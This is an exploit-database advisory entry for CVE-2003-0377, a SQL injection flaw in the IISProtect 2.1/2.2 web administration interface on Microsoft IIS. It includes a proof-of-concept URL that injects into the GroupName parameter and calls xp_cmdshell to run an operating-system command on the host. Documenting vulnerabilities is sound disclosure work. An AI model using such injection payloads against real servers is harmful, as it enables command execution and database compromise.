IISProtect 2.1/2.2 - Web Administration Interface SQL Injection

Author: Gyrniff
type: webapps
platform: asp
port: 
date_added: 2003-05-23 
date_updated: 2012-11-12 
verified: 1 
codes: CVE-2003-0377;OSVDB-4931 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7675/info

The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.

Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences.

http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--

This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.